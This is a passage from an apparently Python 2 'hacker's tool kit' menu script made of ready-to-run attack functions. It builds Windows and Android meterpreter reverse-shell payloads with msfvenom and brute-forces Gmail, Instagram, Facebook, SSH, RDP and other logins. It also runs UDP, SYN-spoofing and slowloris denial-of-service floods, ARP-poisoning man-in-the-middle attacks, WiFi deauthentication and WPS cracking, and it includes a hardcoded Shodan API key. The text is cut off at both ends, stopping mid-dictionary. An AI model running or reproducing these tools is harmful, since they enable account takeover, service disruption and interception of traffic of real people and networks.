check a web application for firewall +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +\033[91m---------------------------------------------------------------------------------\033[0m + """ +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) +def wifite(): + os.system("wifite") +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +def netdev(): + os.system("netdiscover") +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + os.system("iwconfig") + os.system("neofetch") + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + show = 'macchanger -s {0}'.format(k) + os.system(show) +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() + +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" + +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') + +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def arppois(): + + try: + os.system("iwconfig") + interface = raw_input("[*] Enter Interface: ") + victimIP = raw_input("[*] Enter Victim IP: ") + gateIP = raw_input("[*] Enter Router IP: ") + except KeyboardInterrupt: + print "\n[*] User Requested Shutdown" + print "[*] Exiting..." + os.system("clear") + mainbanner() + + print "\n[*] Enabling IP Forwarding...\n" + os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") + + def get_mac(IP): + conf.verb = 0 + ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) + for snd,rcv in ans: + return rcv.sprintf(r"%Ether.src%") + + def reARP(): + + print "\n[*] Restoring Targets..." + victimMAC = get_mac(victimIP) + gateMAC = get_mac(gateIP) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) + print "[*] Disabling IP Forwarding..." + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[*] Shutting Down..." + os.system("clear") + mainbanner() + + def trick(gm, vm): + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) + + def mitm(): + try: + victimMAC = get_mac(victimIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Victim MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + try: + gateMAC = get_mac(gateIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Gateway MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + print "[*] Poisoning Targets..." + while 1: + try: + trick(gateMAC, victimMAC) + time.sleep(1.5) + except KeyboardInterrupt: + reARP() + break + mitm() +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", 